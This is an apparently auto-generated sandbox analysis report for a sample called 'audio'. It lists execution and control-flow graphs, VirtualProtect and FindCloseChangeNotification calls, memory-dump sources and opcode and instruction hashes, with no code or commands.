                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23c782067e0bb56b4e053da0c0e9a2c2b33087554c7ef132f5ff703e11a1a67c
                                                      • Instruction ID: 8ebbf2cee9dbd981a0ab807d1950f29b834ed52e728f81abe6d253f52714dcb3
                                                      • Opcode Fuzzy Hash: 23c782067e0bb56b4e053da0c0e9a2c2b33087554c7ef132f5ff703e11a1a67c
                                                      • Instruction Fuzzy Hash: 1001D671418340AFE7724E25CD84BEBFBD8EF85664F18C41AED490F282C3799841DAB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage: 12.3%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 14
                                                      Total number of Limit Nodes: 0
                                                      Execution graph (node addresses, resolved API calls and edges):
                                                      execution_graph 1760 670c10 1761 670c19 1760->1761 1764 67266f 1760->1764 1767 6732bf 1760->1767 1770 6792c0 1764->1770 1769 6792c0 VirtualProtect 1767->1769 1768 6732d8 1769->1768 1772 6792d3 1770->1772 1774 679378 1772->1774 1775 6793c0 VirtualProtect 1774->1775 1777 67268e 1775->1777 1756 679548 1757 679588 FindCloseChangeNotification 1756->1757 1759 6795b9 1757->1759

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 0 679378-6793f9 VirtualProtect 3 679402-679427 0->3 4 6793fb-679401 0->4 4->3
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 006793EC
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1605092525.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_670000_audio.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 8c6639dd4475289db97a906f5cb3f19d513527ce2eb4cdcd708dec917998508f
                                                      • Instruction ID: c9901480336364e711936b1edf9f66936158ace2f6d131bc10c714f00be75470
                                                      • Opcode Fuzzy Hash: 8c6639dd4475289db97a906f5cb3f19d513527ce2eb4cdcd708dec917998508f
                                                      • Instruction Fuzzy Hash: 3511F4B19042099FDB10DFAAC884BDFFBF5EF48320F14842AE419A7250C7759941CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 8 679548-6795b7 FindCloseChangeNotification 11 6795c0-6795e5 8->11 12 6795b9-6795bf 8->12 12->11
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 006795AA
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1605092525.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_670000_audio.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 4d2e5f22d879018bda3fd28f588c1030dbfe112a1a8578fd19b68d3f2432e372
                                                      • Instruction ID: fe738e70fbd57a112877490b45dc1988e52e9b67cf645e8ed9d787825592c00a
                                                      • Opcode Fuzzy Hash: 4d2e5f22d879018bda3fd28f588c1030dbfe112a1a8578fd19b68d3f2432e372
                                                      • Instruction Fuzzy Hash: 451128719003498FDB10DFAAC4457DFFBF5EB88314F14841AD419A7240C775A940CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 102 61d5c4-61d5d6 103 61d66a-61d671 102->103 104 61d5dc 102->104 105 61d5de-61d5ea 103->105 104->105 107 61d5f0-61d612 105->107 108 61d676-61d67b 105->108 109 61d680-61d695 107->109 110 61d614-61d632 107->110 108->107 114 61d64c-61d654 109->114 113 61d63a-61d64a 110->113 113->114 115 61d6a2 113->115 116 61d697-61d6a0 114->116 117 61d656-61d667 114->117 116->117
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e39145db440642212d4d0ae6a96f943a5d4538fa0c0cbb662e429d525204b7ea
                                                      • Instruction ID: 6018c8773841202d28a42469a3cc2e631ae2433a6721a791ea06406237a53f86
                                                      • Opcode Fuzzy Hash: e39145db440642212d4d0ae6a96f943a5d4538fa0c0cbb662e429d525204b7ea
                                                      • Instruction Fuzzy Hash: 4021F5B1504244EFDB05DF10D9C0BA6BBA6FB98314F28C569E8490B356C336D896DBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 85 61d4d8-61d4ea 86 61d4f0 85->86 87 61d57e-61d585 85->87 88 61d4f2-61d4fe 86->88 87->88 90 61d504-61d526 88->90 91 61d58a-61d58f 88->91 92 61d594-61d5a9 90->92 93 61d528-61d546 90->93 91->90 97 61d560-61d568 92->97 96 61d54e-61d55e 93->96 96->97 98 61d5b6 96->98 99 61d5ab-61d5b4 97->99 100 61d56a-61d57b 97->100 99->100
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1aefb3a07b04dd7e6a5f2a673ed2c707274442e243fb84ae147fad250b37a3ef
                                                      • Instruction ID: 7eb4ecfe32371e5b5ac20aab679881189264d34d3e8b299e0785530c4bba8a28
                                                      • Opcode Fuzzy Hash: 1aefb3a07b04dd7e6a5f2a673ed2c707274442e243fb84ae147fad250b37a3ef
                                                      • Instruction Fuzzy Hash: 6C2106B1504240DFDB04DF14D9C0B96BBA7FB98318F288569E8090B256C336D896CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 214 61d4d3-61d4ea 215 61d4f0 214->215 216 61d57e-61d585 214->216 217 61d4f2-61d4fe 215->217 216->217 219 61d504-61d526 217->219 220 61d58a-61d58f 217->220 221 61d594-61d5a9 219->221 222 61d528-61d546 219->222 220->219 226 61d560-61d568 221->226 225 61d54e-61d55e 222->225 225->226 227 61d5b6 225->227 228 61d5ab-61d5b4 226->228 229 61d56a-61d57b 226->229 228->229
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: fc9d34d1470bbe4260f9306395d7de3331dd83997f358012dbbf537f0f4c591a
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: 9A11B1B6504240DFCB15CF10D5C4B96BF72FB94318F28C6A9D8090B756C33AD89ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 231 61d5bf-61d5d6 232 61d66a-61d671 231->232 233 61d5dc 231->233 234 61d5de-61d5ea 232->234 233->234 236 61d5f0-61d612 234->236 237 61d676-61d67b 234->237 238 61d680-61d695 236->238 239 61d614-61d632 236->239 237->236 243 61d64c-61d654 238->243 242 61d63a-61d64a 239->242 242->243 244 61d6a2 242->244 245 61d697-61d6a0 243->245 246 61d656-61d667 243->246 245->246
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: c1997567a32ef75555be8ed20da3f93a145fbeff55df0d7168325db1de17f697
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: B711D376504280DFCB15CF10D5C4B96BF72FB94314F28C6A9D8490B756C33AD89ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 290 61d006-61d03d 291 61d08d-61d095 290->291 292 61d03f-61d04a 290->292 291->292 293 61d082-61d089 292->293 294 61d04c-61d05a 292->294 293->294 299 61d08b 293->299 296 61d060 294->296 298 61d063-61d06b 296->298 300 61d07b-61d080 298->300 301 61d06d-61d075 298->301 299->298 300->301
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cac5c7d2896d7d99fd659eb771765cde0a26d5ff3a10db5d8927a13ccc051440
                                                      • Instruction ID: 824afb621cdcb3586412059ac85909dc677cd710f9886dd13a0baa3323ec3487
                                                      • Opcode Fuzzy Hash: cac5c7d2896d7d99fd659eb771765cde0a26d5ff3a10db5d8927a13ccc051440
                                                      • Instruction Fuzzy Hash: A4010C6140E3C09FD7128B258D94B92BFB4DF57225F1D81DBD9888F2A3C2699C49C772
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 303 61d01d-61d03d 304 61d08d-61d095 303->304 305 61d03f-61d04a 303->305 304->305 306 61d082-61d089 305->306 307 61d04c-61d05a 305->307 306->307 312 61d08b 306->312 309 61d060 307->309 311 61d063-61d06b 309->311 313 61d07b-61d080 311->313 314 61d06d-61d075 311->314 312->311 313->314
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1604915519.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_61d000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 588194e5c5a2c10c5aeaf6f08bae447a8fbb5f36a2bd924677d169f5cc33d18a
                                                      • Instruction ID: 877591e178869c9f0e38f567e547e7d268a40815bd16d0e9799ffa3c1845ba17
                                                      • Opcode Fuzzy Hash: 588194e5c5a2c10c5aeaf6f08bae447a8fbb5f36a2bd924677d169f5cc33d18a
                                                      • Instruction Fuzzy Hash: F901DB71408340AFE7204E26CC84BE7BBD9DF45765F1CC459DD490B242C3799C82C6B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage: 11.3%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 14
                                                      Total number of Limit Nodes: 0
                                                      Execution graph (node addresses, resolved API calls and edges):
                                                      execution_graph 1848 2220c10 1849 2220c19 1848->1849 1852 22232bf 1848->1852 1855 222266f 1848->1855 1858 22292c0 1852->1858 1857 22292c0 VirtualProtect 1855->1857 1856 222268e 1857->1856 1860 22292d3 1858->1860 1862 2229378 1860->1862 1863 22293c0 VirtualProtect 1862->1863 1865 22232d8 1863->1865 1866 2229548 1867 2229588 FindCloseChangeNotification 1866->1867 1869 22295b9 1867->1869

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 0 2229378-22293f9 VirtualProtect 3 2229402-2229427 0->3 4 22293fb-2229401 0->4 4->3
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022293EC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703402209.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 6801612928213573a5e5b779d3de71e97df8e8cea162d3bfc3c7110660f005b9
                                                      • Instruction ID: 2d2e254a1065e661bde40bf9a7aabe3c1e1e8863f60d58cd7f0b306ff1802847
                                                      • Opcode Fuzzy Hash: 6801612928213573a5e5b779d3de71e97df8e8cea162d3bfc3c7110660f005b9
                                                      • Instruction Fuzzy Hash: 0D11F4B19003499FDB20DFAAC884BAFFBF4AF48214F14842AE459A7250C7759945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 8 2229548-22295b7 FindCloseChangeNotification 11 22295c0-22295e5 8->11 12 22295b9-22295bf 8->12 12->11
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 022295AA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703402209.0000000002220000.00000040.00000800.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2220000_audio.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 37d7724f303025d1860a65eb9755dcfa8785418d64a5b7338a63b7f99ca57987
                                                      • Instruction ID: e9d3de6a858eacfdaaf52157bf9f15202d9b6ce039cb61b8b471005eb1f171fd
                                                      • Opcode Fuzzy Hash: 37d7724f303025d1860a65eb9755dcfa8785418d64a5b7338a63b7f99ca57987
                                                      • Instruction Fuzzy Hash: 2C113A719003498FDB20DFAAC4457DFFBF8AF88214F24841AD519A7640C779A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (basic-block address ranges and edges):
                                                      control_flow_graph 100 21bd4d8-21bd4ea 101 21bd57e-21bd585 100->101 102 21bd4f0 100->102 103 21bd4f2-21bd4fe 101->103 102->103 104 21bd58a-21bd58f 103->104 105 21bd504-21bd526 103->105 104->105 107 21bd528-21bd546 105->107 108 21bd594-21bd5a9 105->108 111 21bd54e-21bd55e 107->111 112 21bd560-21bd568 108->112 111->112 113 21bd5b6 111->113 114 21bd5ab-21bd5b4 112->114 115 21bd56a-21bd57b 112->115 114->115
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e848552b18473cdd7374c366c5cdd3dd9574263232659900b07f3f2e2efebcac
                                                      • Instruction ID: 28d1e90e7c429578bbcc30e8bcc2c52e37d29b01261c38e00881a73807f2ea1a
                                                      • Opcode Fuzzy Hash: e848552b18473cdd7374c366c5cdd3dd9574263232659900b07f3f2e2efebcac
                                                      • Instruction Fuzzy Hash: BF2137B1544300DFDB0ADF10E9C0B66BBB5FF88318F208169E8090B256C336D856CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph [rendered graph not reproduced]
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9b71c841e3d4d9a5c259b5629d487da2bfeda897cbb0f770905ca5172c88f2f
                                                      • Instruction ID: ce07053b0e66a15694d000fe602df851e95ca392785bce48c283f09bc705248b
                                                      • Opcode Fuzzy Hash: b9b71c841e3d4d9a5c259b5629d487da2bfeda897cbb0f770905ca5172c88f2f
                                                      • Instruction Fuzzy Hash: 3721D3B1544244EFDB0ADF20E9C0B66BBB5FF88314F24C569E8490B246C336D456CAE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph [rendered graph not reproduced]
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: e99e04764a0ff8734a007ac49ae727d4b04277c137c1bfe24e375ef45f863427
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: C111D3B6544280CFCB16CF10D5C4B56BF71FF88314F24C6A9D8494B656C33AD45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph [rendered graph not reproduced]
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: c754a586a0abdaff788f718b5ceccf7f8b07d893dcd9ac40a48ef0b8b6cbd53a
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: A811D376544240CFCB16CF10D5C4B56BF71FF84318F24C6A9D8094B656C33AD45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph [rendered graph not reproduced]
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd6d7035876ba77127cac1e53723155828dab39a4cb57da281b4b305b21d5ecc
                                                      • Instruction ID: 058707527086418938cd288fbd93345ed16b0500d0852ac257386157710590c3
                                                      • Opcode Fuzzy Hash: bd6d7035876ba77127cac1e53723155828dab39a4cb57da281b4b305b21d5ecc
                                                      • Instruction Fuzzy Hash: FF01697104D3C09FD7168B259884792BFB8DF43224F1985CBE9888F1A3C3695C44CB72
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph [rendered graph not reproduced]
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1703145952.00000000021BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_21bd000_audio.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfbff5f18571893e7349fe0a16e9e680ded53563c0d5b016167af046d8bc431a
                                                      • Instruction ID: f6210e1979783e74aa9b58d1ca0666318f329021aabe935deb61270c7a054e98
                                                      • Opcode Fuzzy Hash: dfbff5f18571893e7349fe0a16e9e680ded53563c0d5b016167af046d8bc431a
                                                      • Instruction Fuzzy Hash: 2601DB71448340AFE7294E25DD847E7BBE8DF45624F18C419ED580B142C7799841CAB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%